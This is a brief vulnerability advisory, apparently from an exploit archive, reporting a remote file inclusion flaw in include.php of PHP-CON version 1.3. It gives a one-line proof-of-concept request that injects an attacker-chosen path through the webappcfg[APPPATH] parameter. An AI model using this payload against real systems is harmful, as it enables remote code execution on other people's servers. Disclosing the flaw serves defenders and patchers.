PHP-CON version 1.3 suffers from a remote file inclusion vulnerability in include.php.
1b2245850cdd8bc0ce2db14a132a198ePHP-CON v1.3 (include.php)Remote File Inclusion Vulnerability
Script : http://sourceforge.net/project/showfiles.php?group_id=182182
POC :
/PHP_CON/Exchange/include.php?webappcfg[APPPATH]= Evil Code
Comments
No comments yet, be the first!